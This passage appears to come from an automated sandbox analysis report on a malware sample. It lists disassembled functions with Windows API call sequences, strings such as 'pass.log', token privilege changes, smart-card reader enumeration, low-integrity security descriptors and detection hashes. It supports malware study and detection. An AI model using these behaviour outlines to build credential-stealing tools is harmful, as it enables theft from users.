                                                                                                                                                                                                              • Instruction ID: 9196f4d1f555f5e21f29eae765a4bb752e090a3444b56f8c6c8fc6d0f09719a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca9ab4df70549d803e48151aafd26081337060f850de6fcab7dbbb7ea947e2e9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30F01DB5740309BBEB20DE96CD4AFEA77BCBB14B45F504058FB00E7241D674AA0097A4
                                                                                                                                                                                                              Function 01309880 Relevance: 10.1, APIs: 8, Instructions: 56COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0e3a00bceb19dbb27b2ab194080b1ec4d093837b54b0ef7b5980df65e3189c06
                                                                                                                                                                                                              • Instruction ID: 6cd766ca0dbd40d4a049e65646af1495f5fd756e8f09a3c6ba54698ec3fc9a46
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e3a00bceb19dbb27b2ab194080b1ec4d093837b54b0ef7b5980df65e3189c06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B90192B1605244ABE631AFEAAC98F97BF9CEB85719F004027F60897285CA35C500CBB0
                                                                                                                                                                                                              Function 01308AB0 Relevance: 9.1, APIs: 6, Instructions: 108fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000,00000000,00000000,00140B17,?,01309447), ref: 01308AF4
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,01309447), ref: 01308B0E
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,01309447), ref: 01308B36
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?,01309447), ref: 01308B42
                                                                                                                                                                                                                • Part of subcall function 012E7310: GetHandleInformation.KERNEL32(00000000,00000000,?,?,0130564E,?,00000000), ref: 012E7324
                                                                                                                                                                                                                • Part of subcall function 012E7310: CloseHandle.KERNEL32(00000000,?,?,0130564E,?,00000000), ref: 012E7335
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00140B17,00000000,00000000,00140B17,?,01309447), ref: 01308B6E
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00140B17,01309447,00000000,00140B17), ref: 01308BA0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3741995677-0
                                                                                                                                                                                                              • Opcode ID: 01d5b3edd15b8c3a281c717ca75710c877a73d7a913276db48d82612ab9659b0
                                                                                                                                                                                                              • Instruction ID: 290a485ec362985324fa9bf5f690d9ffcdd5846ddb56b474f976cce92198794d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01d5b3edd15b8c3a281c717ca75710c877a73d7a913276db48d82612ab9659b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89313EB1A01609BBD710DF59D885B6AF7B8FF58714F10825AFA0497780D770AD61CBE0
                                                                                                                                                                                                              Function 012E2850 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • calloc.MSVCRT(?,00000004,?,00000000,012E2D01,?,?,012E2967,00000000,00000000,?,?,?,?,012E2D01,00000000), ref: 012E286F
                                                                                                                                                                                                              • exit.MSVCRT(00000001,?,012E2D01,00000000,00000000), ref: 012E287D
                                                                                                                                                                                                              • calloc.MSVCRT(012E2D01,00000004,?,012E2D01,00000000,00000000), ref: 012E2889
                                                                                                                                                                                                              • exit.MSVCRT(00000001), ref: 012E2896
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,00000000,?,?,?), ref: 012E28EA
                                                                                                                                                                                                              • free.MSVCRT(?), ref: 012E290E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexitfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3367576030-0
                                                                                                                                                                                                              • Opcode ID: 4e431985ebb577fa87071395cae3f444f3ddcfae538f9103136f94aefca83298
                                                                                                                                                                                                              • Instruction ID: 2b02454cbec22af2936ea462de80ef0c6bf8152f512bd3f7d1f296b202e6f3ea
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e431985ebb577fa87071395cae3f444f3ddcfae538f9103136f94aefca83298
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C2139B1A1030AABDB20DE58D885AAB7BECFF49710F544529FA4697340D7B1A9108BA1
                                                                                                                                                                                                              Function 01305850 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SCardEstablishContext.WINSCARD(00000002,00000000,00000000,012F6A83,00000000), ref: 01305875
                                                                                                                                                                                                              • SCardListReadersA.WINSCARD(012F6A83,00000000,?,FFFFFFFF), ref: 0130588C
                                                                                                                                                                                                              • SCardConnectA.WINSCARD(012F6A83,?,00000002,00000003,?,?), ref: 013058BE
                                                                                                                                                                                                              • SCardDisconnect.WINSCARD(?,00000000), ref: 013058E9
                                                                                                                                                                                                              • SCardFreeMemory.WINSCARD(012F6A83,?), ref: 01305905
                                                                                                                                                                                                              • SCardReleaseContext.WINSCARD(012F6A83), ref: 01305913
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Card$Context$ConnectDisconnectEstablishFreeListMemoryReadersRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3231658416-0
                                                                                                                                                                                                              • Opcode ID: f5aa3d5d669eaa7e6523afcd82c1223cc610ecf6b226d085ac83c5974a342d46
                                                                                                                                                                                                              • Instruction ID: ea04e3919b584be37883af7b35f19583dde6866ab650c88308373aafafb4542c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5aa3d5d669eaa7e6523afcd82c1223cc610ecf6b226d085ac83c5974a342d46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E214C72E00209EBDB22DF998858BEEBBBDAF84714F144549E911E7184D6709B05CFA0
                                                                                                                                                                                                              Function 013052D0 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF,00000001,00001000,00000000,?,?,?,?), ref: 013052EB
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0130531C
                                                                                                                                                                                                              • TranslateMessage.USER32(?,?,?,?,?), ref: 01305338
                                                                                                                                                                                                              • DispatchMessageW.USER32(?,?,?,?,?), ref: 0130533E
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0130534C
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF,?,?,?,?), ref: 01305364
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1800058468-0
                                                                                                                                                                                                              • Opcode ID: e8127c76ade29b4a6f07813024c7051ff181e507cf43d05c55cca2cbc545f03f
                                                                                                                                                                                                              • Instruction ID: 7ad647533783bdec6ef4c9e38285bdbc3d19793d922ef118f28a613826bd0ea5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8127c76ade29b4a6f07813024c7051ff181e507cf43d05c55cca2cbc545f03f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6711C472B803097AF7309A5C9C86FEF77A8EB40B10F504515FB04EA0C5C6E1E450CBA4
                                                                                                                                                                                                              Function 012ECBF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowRect.USER32(012ECD24,00000000,012ED21D,7707BCB0), ref: 012ECBFF
                                                                                                                                                                                                              • GetWindowLongA.USER32(012ECD24,000000F0,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECD24), ref: 012ECC19
                                                                                                                                                                                                              • GetScrollBarInfo.USER32(012ECD24,000000FA,?), ref: 012ECC34
                                                                                                                                                                                                              • GetScrollBarInfo.USER32(012ECD24,000000FB,0000003C), ref: 012ECC61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoScrollWindow$LongRect
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 4167475372-4251816714
                                                                                                                                                                                                              • Opcode ID: 88b511e9d8e5b5c90aa5608e7bacceca0498cbf19340e8626e73ec35136a714a
                                                                                                                                                                                                              • Instruction ID: 69fda9020e20ab54e64fd3c160cea3669d62903386d2b2d0e89bfbc3e412f628
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88b511e9d8e5b5c90aa5608e7bacceca0498cbf19340e8626e73ec35136a714a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3310770901B02AFC724CFAAD588A56FBF5BF48311B508A1DE59A93B54E730F4A0CF90
                                                                                                                                                                                                              Function 013241A0 Relevance: 8.8, APIs: 7, Instructions: 78COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT(00000050,00000000,00000000,?,01321094), ref: 013241AB
                                                                                                                                                                                                              • malloc.MSVCRT(00004000,?,?,?,000000FF,?), ref: 013241C1
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,000000FF,?), ref: 013241D3
                                                                                                                                                                                                              • malloc.MSVCRT(00000400,?,?,?,?,000000FF,?), ref: 013241EF
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,?,000000FF,?), ref: 0132420E
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,?,000000FF,?), ref: 0132421C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: freemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3061335427-0
                                                                                                                                                                                                              • Opcode ID: 616427dbedc31917207f5e58659dca0b234368ca3d22e969b372b2d9be00a536
                                                                                                                                                                                                              • Instruction ID: 7c0dc5660691951325551018f0c98f3e448e84308151da13f4b28314d77d6cbf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 616427dbedc31917207f5e58659dca0b234368ca3d22e969b372b2d9be00a536
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC2130F2A017144BD730BF7EEC8168BBBE4AF44725B19883ED68AD6600D371E1558B91
                                                                                                                                                                                                              Function 012FB110 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0AD), ref: 012FB137
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 012FB175
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 012FB1B9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePath$AttributesBackslashExists
                                                                                                                                                                                                              • String ID: 61C5C0AD$pass.log
                                                                                                                                                                                                              • API String ID: 2713433229-898113997
                                                                                                                                                                                                              • Opcode ID: d1b8f24cb7d3db50884ab149fa6329d21852ef845d299b385ba7f29df4ce12c2
                                                                                                                                                                                                              • Instruction ID: f4885099ce238aef3588b7b4cbe9d58c7b241fc8bb3d2f82c42464fc6648d024
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1b8f24cb7d3db50884ab149fa6329d21852ef845d299b385ba7f29df4ce12c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F01108715042594BCB329E2CA9687E7BBE4EB86301F1446ADDEC987305EA708448CB90
                                                                                                                                                                                                              Function 012E78E0 Relevance: 8.8, APIs: 7, Instructions: 64memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012E74A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,9e2b3e8fa,7765C3F0,?,?,012F2600,00000000,00000001), ref: 012E74C6
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E74E4
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E750D
                                                                                                                                                                                                                • Part of subcall function 012E74A0: HeapAlloc.KERNEL32(00000000,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E7514
                                                                                                                                                                                                                • Part of subcall function 012E74A0: memset.MSVCRT(00000000,00000000,00000001,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E7527
                                                                                                                                                                                                                • Part of subcall function 012E74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E7553
                                                                                                                                                                                                                • Part of subcall function 012E74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E7563
                                                                                                                                                                                                                • Part of subcall function 012E74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 012E7572
                                                                                                                                                                                                                • Part of subcall function 012E74A0: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E7585
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E7594
                                                                                                                                                                                                                • Part of subcall function 012E74A0: HeapValidate.KERNEL32(00000000), ref: 012E759B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,775B5CE0,012F3D3F), ref: 012E791C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012E7923
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000013), ref: 012E7933
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,775B5CE0,012F3D3F), ref: 012E7955
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E7958
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E7965
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E7968
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$AllocValidatememset$CreateFreeLockPointerReadSizeUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 465464135-0
                                                                                                                                                                                                              • Opcode ID: fde2af6ab6f7fef33543950ff01bcb4a66580b5ef00d9aff746e49b86cb8ce39
                                                                                                                                                                                                              • Instruction ID: 2f89271df6a8abd87dd2408c0f7131a77e09bd51f0f52781b1ed3c3832e406f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fde2af6ab6f7fef33543950ff01bcb4a66580b5ef00d9aff746e49b86cb8ce39
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D118671711216ABE730AEA99C48F9F7AACEF95B51F514128FA05E7284DA70DA0087E0
                                                                                                                                                                                                              Function 012F41E0 Relevance: 8.8, APIs: 7, Instructions: 55memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,01305097,00000000,759834D0,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F41FE
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4205
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,01305097,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4215
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,759834D0,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4229
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4230
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,01304081,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F424A
                                                                                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4251
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$Validatememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3638075499-0
                                                                                                                                                                                                              • Opcode ID: 0c531ea70e8ed5f025ab70cd477baeec311b33d05298b22d01e22a2368a96a57
                                                                                                                                                                                                              • Instruction ID: b097551203323fdedb20cee6a69d0880ebb876842c6278a5ba20d31602f902f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c531ea70e8ed5f025ab70cd477baeec311b33d05298b22d01e22a2368a96a57
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5601F77764021167E7317AAEAC48F977A1CEFD17B2F158235FB08C7284CA61840483F0
                                                                                                                                                                                                              Function 013059D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                                • Part of subcall function 01305930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                                • Part of subcall function 01305930: AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                                • Part of subcall function 01305930: GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                                • Part of subcall function 01305930: CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 013059EE
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,012E4C50,?,?,012E4C50,?,00000001), ref: 01305A0B
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,012E4C50,00000010,00000000,00000000,00000000,00000001), ref: 01305A26
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,012E4C50,?,00000001), ref: 01305A37
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorToken$CurrentOpenProcessThread$AdjustCloseConvertErrorFreeHandleInfoLastLocalLookupNamedPrivilegePrivilegesSaclStringValue
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 2236266002-820036962
                                                                                                                                                                                                              • Opcode ID: a1cc83e6690eaaf9d5dd23a321fa0b831c6b3e37476857359f9496bbe176311f
                                                                                                                                                                                                              • Instruction ID: 79c3c8004d36f088020785a3d30f728a19555ff654ca3914ba3ed764827f0f47
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1cc83e6690eaaf9d5dd23a321fa0b831c6b3e37476857359f9496bbe176311f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4014C76A00218BBEB21EEA59C84EEFBBBCEF54744F008149FD0592284D670DA44CBA4
                                                                                                                                                                                                              Function 012F7810 Relevance: 8.8, APIs: 7, Instructions: 50memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 01304980: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7763FFB0,?,?,?,?,?,012F7967,00000000,?,00000000), ref: 013049AD
                                                                                                                                                                                                                • Part of subcall function 01304980: GetProcessTimes.KERNEL32(00000000,?,?,?,012F7967,?,?,?,?,?,012F7967,00000000,?,00000000), ref: 013049CA
                                                                                                                                                                                                                • Part of subcall function 01304980: GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,012F7967,00000000,?,00000000), ref: 013049E2
                                                                                                                                                                                                                • Part of subcall function 01304980: CloseHandle.KERNEL32(00000000,?,?,?,?,?,012F7967,00000000), ref: 013049F3
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB80,?,00000000,00000000,00000000,012F7AD4), ref: 012F7828
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB80), ref: 012F7844
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F7869
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F786C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F7879
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F787C
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB80), ref: 012F7887
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
